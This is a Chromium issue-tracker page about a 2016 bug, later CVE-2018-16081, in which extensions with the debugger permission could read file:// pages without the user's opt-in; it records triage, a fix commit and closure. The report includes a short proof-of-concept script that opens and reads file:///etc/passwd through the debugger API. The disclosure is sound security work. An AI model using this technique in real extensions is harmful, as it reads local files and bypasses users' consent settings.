New issue
Advanced search Search tips
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Jun 2018
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Linux , Windows , Chrome , Mac
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 666299: Security: debugger extension API bypasses normal opt-in for file:// access

Reported by jannh@google.com, Nov 17 2016 Project Member

Issue description

VULNERABILITY DETAILS
An extension with "debugger" permission can inject code into file:// origins without explicit file URI access permission (the "Allow access to file URLs" checkbox) using the debugger API. Since it seems like the intent of that checkbox is to require more explicit opt-in from the user, I believe that this is a security bug.

Since this only goes from extension context with pretty high privileges to file:// context, I think this is probably low severity?

VERSION
Chrome Version: 54.0.2840.100 stable
Operating System: Linux

REPRODUCTION CASE
To reproduce, in an extension with "debugger" permission but without explicit file:// access opt-in, run this:

chrome.tabs.create({url:'file:///etc/passwd'}, function(res){
  var tabId = res.id;
  chrome.debugger.attach({tabId:tabId}, '1.1', function(){
    var itv = setInterval(function(){
      chrome.debugger.sendCommand({tabId:tabId}, 'Runtime.evaluate', {expression:'document.body.innerText'}, function(res){
        if (res.result.type === 'string' && res.result.value != '') {
          clearInterval(itv);
          chrome.tabs.remove(tabId);
          alert(res.result.value);
        }
      })
    }, 50);
  })
})
 

Comment 1 by mea...@chromium.org, Nov 18 2016

Components: Platform>Extensions
Labels: Security_Severity-Low Security_Impact-Stable OS-Chrome OS-Linux OS-Mac OS-Windows
Owner: rdevlin....@chromium.org
Status: Assigned (was: Unconfirmed)
Assigning low severity, as the debugger permission is quite powerful already. Devlin, can you please take a look?

Comment 2 by sheriffbot@chromium.org, Nov 19 2016

Project Member
Labels: Pri-2

Comment 3 by mea...@chromium.org, Jan 26 2018

Components: Platform>Apps>DevTools
Labels: -Security_Severity-Low Security_Severity-Medium
Looks like this slipped through the cracks because of my low-severity rating, upgrading to medium severity. This bugs predates most of the bugs reported about devtools + extensions.

Comment 4 by sheriffbot@chromium.org, Jan 26 2018

Project Member
rdevlin.cronin: Uh oh! This issue still open and hasn't been updated in the last 434 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 5 by sheriffbot@chromium.org, Jan 26 2018

Project Member
Labels: M-64

Comment 6 by sheriffbot@chromium.org, Jan 26 2018

Project Member
Labels: -Pri-2 Pri-1

Comment 7 by sheriffbot@chromium.org, Feb 9 2018

Project Member
rdevlin.cronin: Uh oh! This issue still open and hasn't been updated in the last 448 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers?

If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one?

If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started.

Thanks for your time! To disable nags, add the Disable-Nags label.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 8 by sheriffbot@chromium.org, Mar 7 2018

Project Member
Labels: -M-64 M-65

Comment 9 by sheriffbot@chromium.org, Apr 19 2018

Project Member
Labels: -M-65 M-66

Comment 10 by sheriffbot@chromium.org, May 30 2018

Project Member
Labels: -M-66 M-67

Comment 11 by carlosil@chromium.org, Jun 7 2018

Friendly security sheriff ping, this has been open for a while, any progress on it?

Comment 12 by rdevlin....@chromium.org, Jun 7 2018

Labels: -M-67 M-68
On it.

Comment 13 by rdevlin....@chromium.org, Jun 7 2018

Cc: dgozman@chromium.org
dgozman@, hoping you can guide me a bit for part of this.  It's easy enough to prevent the debugging host from attaching initially (I have a CL and test for this ready), but there's a tricky bit where we need to detach the debugger if the tab navigates to a file:// URL the extension doesn't have access to.  I think you recently handled something similar with webui pages; do you have some advice on how to handle this?

Comment 14 by dgozman@chromium.org, Jun 7 2018

This function [1] is called for debugging sessions from extensions when trying to attach or page navigates somewhere. Returning false disconnects the debugging session.

[1] https://cs.chromium.org/chromium/src/content/browser/devtools/render_frame_devtools_agent_host.cc?rcl=6f29d60a5f3c8d095274b9a92c45e45b9cdf839b&l=966

Comment 15 by bugdroid1@chromium.org, Jun 22 2018

Project Member
The following revision refers to this bug:
  https://chromium.googlesource.com/chromium/src.git/+/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877

commit 4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877
Author: Devlin Cronin <rdevlin.cronin@chromium.org>
Date: Fri Jun 22 23:16:31 2018

[Extensions] Restrict debugging file:-scheme URLs

Don't allow extensions to debug file:-scheme URLs if the extension does
not have explicit file access (as set in chrome://extensions). Achieve
this by introducing a new virtual method on DevToolsAgentHostClient to
allow the implementor to check if a given host is allowed to be
inspected.

Add regression tests for the same.

Bug:  666299 

Change-Id: Icb5ee89bf788643eee166eef83802d10ab825a6c
Reviewed-on: https://chromium-review.googlesource.com/1104954
Commit-Queue: Devlin <rdevlin.cronin@chromium.org>
Reviewed-by: Dmitry Gozman <dgozman@chromium.org>
Cr-Commit-Position: refs/heads/master@{#569828}
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/browser/extensions/api/debugger/debugger_api.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/browser/extensions/api/debugger/debugger_apitest.cc
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/background.js
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/dummy.html
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/chrome/test/data/extensions/api_test/debugger_file_access/manifest.json
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/devtools_agent_host_impl.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/devtools_agent_host_impl.h
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/render_frame_devtools_agent_host.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/browser/devtools/render_frame_devtools_agent_host.h
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/BUILD.gn
[add] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/devtools_agent_host_client.cc
[modify] https://crrev.com/4dafc317b6e614bdd86ea3e2f5c2fc2e8518a877/content/public/browser/devtools_agent_host_client.h

Comment 16 by tsepez@chromium.org, Jun 27 2018

So, did the CL in c#15 fix the issue?  Can we close this one out?  Thanks heaps!

Comment 17 by rdevlin....@chromium.org, Jun 27 2018

Status: Fixed (was: Assigned)
I believe this should be fixed, yes.

Closing it out.

Anyone have opinions on if this should be merged to M68?

Comment 18 by dgozman@chromium.org, Jun 27 2018

This bug filed in 2016 - so I'd say no merge.

Comment 19 by sheriffbot@chromium.org, Jun 28 2018

Project Member
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify

Comment 20 by awhalley@google.com, Jul 23 2018

Labels: -M-68 M-69

Comment 21 by awhalley@google.com, Aug 16

Labels: Release-0-M69

Comment 22 by awhalley@chromium.org, Sep 4

Labels: CVE-2018-16081 CVE_description-missing

Comment 23 by sheriffbot@chromium.org, Oct 4

Project Member
Labels: -Restrict-View-SecurityNotify allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 24 by awhalley@chromium.org, Jan 4

Labels: -CVE_description-missing CVE_description-submitted

Sign in to add a comment